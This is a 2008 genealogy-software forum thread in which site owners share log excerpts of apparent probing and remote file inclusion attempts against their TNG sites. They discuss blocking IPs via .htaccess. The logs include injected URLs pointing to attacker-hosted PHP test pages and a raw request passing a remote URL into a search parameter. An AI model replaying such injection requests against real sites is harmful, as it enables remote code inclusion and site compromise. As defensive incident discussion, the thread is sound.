Jump to content
TNG Community

Possible hacker attempt in showlog file----Darrin's Reply


TNGUSER

Recommended Posts

I posted a question on the Forum awhile back regarding a "()" entry that I've seen in my showlog from various IP addresses but no one knew the answer to my question as to what this entry was or how it was generated. I've also searched the WWW and no hits on identifying what this entry means.

When I click on the "()" entry in my log file I get a 404 error code. Today I found three more "()" entries by the same IP address:

Mon 21 Apr 2008 01:05:15 PM () accessed by 211.78.87.178

Mon 21 Apr 2008 01:05:13 PM () accessed by 211.78.87.178

Mon 21 Apr 2008 01:05:09 PM () accessed by 211.78.87.178

I wrote to my webhost, ICDSoft and they suggested I get in touch with Darrin. Here is his reply.

I strongly urge anyone reading this to review your log files for any "()" entries and most especially make sure you've applied the most recent (security) updates from Darrin. I've also denied access from 211.78.87.178 in my .htaccess file and will continue to ban all others who I see have generated a "()" log entry.

Carol

Darrin's reply received today Monday, April 21, 2008................

It could very well be an attempt to find a vulnerability in the software.

As long as you're up to date, you shouldn't fall prey to any known

vulnerabilities, however. The empty parentheses probably mean that someone

attempted to access the getperson.php page without a valid person ID.

In any case, please contact me or the support forum or the mailing list

with any questions about TNG. ICDSoft will not know anything about the

software.

Darrin

Link to comment
Share on other sites

In the interest and for the security of all, you might want to post here, IP addresses that you see in your log file that include the "()" entry. It would be up to the individual TNG site owner whether or not to exclude those IP address from access but at least those of us viewing this Topic would know which IP addresses may be suspect.

Carol

Link to comment
Share on other sites

I'm also getting hammered by these guys. We've been playing a little game all day. They show up, I add an IP to my htaccess file, they go away and then an hour or two later they come back with another IP. They are only around for a couple of minutes but they hit lots of files at about one every couple of seconds. I get some of the () entries and they hit lots of files that don't exist. Looks like this;

Mon 21 Apr 2008 03:43:14 PM Cemeteries and Headstones in USA accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:14 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:14 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:13 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:13 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:13 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:12 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:12 PM Earl B. and Eva Allison (60) accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:11 PM Place List: accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:10 PM Place List: accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:08 PM Notes accessed by mail.peter-c.com.

The scary one is this one;

Mon 21 Apr 2008 12:01:35 PM Descendancy for (I203) accessed by unknown.

Mon 21 Apr 2008 12:01:32 PM Documents accessed by unknown.

Mon 21 Apr 2008 12:01:30 PM Descendancy for (I203) accessed by unknown.

Mon 21 Apr 2008 12:01:28 PM () accessed by unknown.

Mon 21 Apr 2008 12:01:27 PM () accessed by unknown.

Mon 21 Apr 2008 12:01:26 PM () accessed by unknown.

Mon 21 Apr 2008 12:01:25 PM Documents accessed by unknown.

Mon 21 Apr 2008 12:01:24 PM Documents accessed by unknown.

Mon 21 Apr 2008 12:01:23 PM Documents accessed by unknown.

How do you block someone who you can't identify?

Here are some of the other IPs I have banned so far;

Mon 21 Apr 2008 06:22:14 PM (R1) accessed by host-213-189-188-42.brutele.be.

Mon 21 Apr 2008 11:09:12 AM Ahnentafel: (I261) accessed by ws03.hosting.nl.

Sun 20 Apr 2008 09:14:15 PM Family of Maugherman Orpha (I278) accessed by vev69-2-82-241-34-212.fbx.proxad.net.

retail.telecomitalia.it

212.6.249.20

And that's just today. I'm pretty paranoid since I got hacked last month (yeah I know, I should have upgraded sooner). There is no evidence that anything has been compromised and they only stick around for a few minutes but I'll keep blocking and maybe they will eventually go away.

Lucky

Link to comment
Share on other sites

I'm also getting hammered by these guys. We've been playing a little game all day. They show up, I add an IP to my htaccess file, they go away and then an hour or two later they come back with another IP. They are only around for a couple of minutes but they hit lots of files at about one every couple of seconds. I get some of the () entries and they hit lots of files that don't exist. Looks like this;

Mon 21 Apr 2008 03:43:14 PM Cemeteries and Headstones in USA accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:14 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:14 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:13 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:13 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:13 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:12 PM () accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:12 PM Earl B. and Eva Allison (60) accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:11 PM Place List: accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:10 PM Place List: accessed by mail.peter-c.com.

Mon 21 Apr 2008 03:43:08 PM Notes accessed by mail.peter-c.com.

The scary one is this one;

Mon 21 Apr 2008 12:01:35 PM Descendancy for (I203) accessed by unknown.

Mon 21 Apr 2008 12:01:32 PM Documents accessed by unknown.

Mon 21 Apr 2008 12:01:30 PM Descendancy for (I203) accessed by unknown.

Mon 21 Apr 2008 12:01:28 PM () accessed by unknown.

Mon 21 Apr 2008 12:01:27 PM () accessed by unknown.

Mon 21 Apr 2008 12:01:26 PM () accessed by unknown.

Mon 21 Apr 2008 12:01:25 PM Documents accessed by unknown.

Mon 21 Apr 2008 12:01:24 PM Documents accessed by unknown.

Mon 21 Apr 2008 12:01:23 PM Documents accessed by unknown.

How do you block someone who you can't identify?

Here are some of the other IPs I have banned so far;

Mon 21 Apr 2008 06:22:14 PM (R1) accessed by host-213-189-188-42.brutele.be.

Mon 21 Apr 2008 11:09:12 AM Ahnentafel: (I261) accessed by ws03.hosting.nl.

Sun 20 Apr 2008 09:14:15 PM Family of Maugherman Orpha (I278) accessed by vev69-2-82-241-34-212.fbx.proxad.net.

retail.telecomitalia.it

212.6.249.20

And that's just today. I'm pretty paranoid since I got hacked last month (yeah I know, I should have upgraded sooner). There is no evidence that anything has been compromised and they only stick around for a few minutes but I'll keep blocking and maybe they will eventually go away.

Lucky

Lucky, you are getting hit pretty hard and the "Unknown" entry would worry me too. I hope someone will be able to tell you how that kind of entry can be blocked.

Carol

Link to comment
Share on other sites

In the interest and for the security of all, please post HERE any IP addresses that you see in your log file that include the "()" entry. It would be up to the individual TNG site owner whether or not to exclude those IP address from access but at least those of us viewing this Topic would know which IP addresses are suspect.

Carol

Hi

I'm also having the problem

Mon 21 Apr 2008 10:33:07 PM Family Group Sheet for Family ptth://honamfishing.co.kr/phpmysqladmin/libraries/nov/wulosu/ accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:06 PM Family Group Sheet for Family ptth://wwww.unduetretoccaate.it/codice/fog/iyi/ accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:06 PM Family Group Sheet for Family ptth://wwww.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/ accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:45 PM () accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:44 PM () accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:44 PM () accessed by 212.227.64.44/.

And I think this one are trying the same

Tue 22 Apr 2008 11:43:21 AM Family Group Sheet for Family ptth://wwww.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/ accessed by 193.254.184.38/.

Tue 22 Apr 2008 11:43:21 AM Family Group Sheet for Family ptth://honamfishing.co.kr/phpmysqladmin/libraries/nov/wulosu/ accessed by 193.254.184.38/.

Tue 22 Apr 2008 11:43:20 AM Family Group Sheet for Family ptth://wwww.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/ accessed by 193.254.184.38/.

Torben

Link to comment
Share on other sites

Hi

I'm also having the problem

Mon 21 Apr 2008 10:33:07 PM Family Group Sheet for Family ptth://honamfishing.co.kr/phpmysqladmin/libraries/nov/wulosu/ accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:06 PM Family Group Sheet for Family ptth://wwww.unduetretoccaate.it/codice/fog/iyi/ accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:06 PM Family Group Sheet for Family ptth://wwww.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/ accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:45 PM () accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:44 PM () accessed by 212.227.64.44/.

Mon 21 Apr 2008 10:33:44 PM () accessed by 212.227.64.44/.

And I think this one are trying the same

Tue 22 Apr 2008 11:43:21 AM Family Group Sheet for Family ptth://wwww.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/ accessed by 193.254.184.38/.

Tue 22 Apr 2008 11:43:21 AM Family Group Sheet for Family ptth://honamfishing.co.kr/phpmysqladmin/libraries/nov/wulosu/ accessed by 193.254.184.38/.

Tue 22 Apr 2008 11:43:20 AM Family Group Sheet for Family ptth://wwww.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/ accessed by 193.254.184.38/.

Torben

Between these two they viewed 300+ records early this morning.

() accessed by ip202-182-124-4.voicevalley-networks.com

() accessed by ev1s-67-15-72-87.ev1servers.net

Carol

Link to comment
Share on other sites

Between these two they viewed 300+ records early this morning.

() accessed by ip202-182-124-4.voicevalley-networks.com

() accessed by ev1s-67-15-72-87.ev1servers.net

Carol

I got a couple more but they seem to be slowing down today. They were each only around about two minutes hitting 40-50 records each. Maybe they are getting tired.

Mon 21 Apr 2008 11:02:36 PM () accessed by cornaline.logicek.net

Tue 22 Apr 2008 07:35:39 AM () accessed by 66.205.65.100

Lucky

Link to comment
Share on other sites

Interestingly I'm getting some of the same urls mentioned by Torben above. Seems like they search for a form on your page and then insert the http://........ stuff into the form. Going to the websites shown above you find a web page that has only

"<?php echo md5("just_a_test");?>"

I suspect that's what would be inserted into your website if they are successful. If anybody knows how to read server logs (I really don't) here's what most of the lines look like in my server log with differing URLs.

66.205.65.100 - - [22/Apr/2008:09:35:02 -0400] "GET /placesearch.php?psearch=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Ftimuji%2Fogu%2F HTTP/1.0" 200 10975 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

Lucky

Link to comment
Share on other sites

Interestingly I'm getting some of the same urls mentioned by Torben above. Seems like they search for a form on your page and then insert the http://........ stuff into the form. Going to the websites shown above you find a web page that has only

"<?php echo md5("just_a_test");?>"

I suspect that's what would be inserted into your website if they are successful. If anybody knows how to read server logs (I really don't) here's what most of the lines look like in my server log with differing URLs.

66.205.65.100 - - [22/Apr/2008:09:35:02 -0400] "GET /placesearch.php?psearch=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Ftimuji%2Fogu%2F HTTP/1.0" 200 10975 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

Lucky

I don't have any idea either how to read those logs. Hopefully someone else will take a look and know what it all means.

I wonder if there is any way to edit the .htaccess file or similar file to auto block any IP address that tries to access the getperson.php without a valid ID rather than adding all the individual IP addresses that return a "()" in the showlog file.

Carol

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...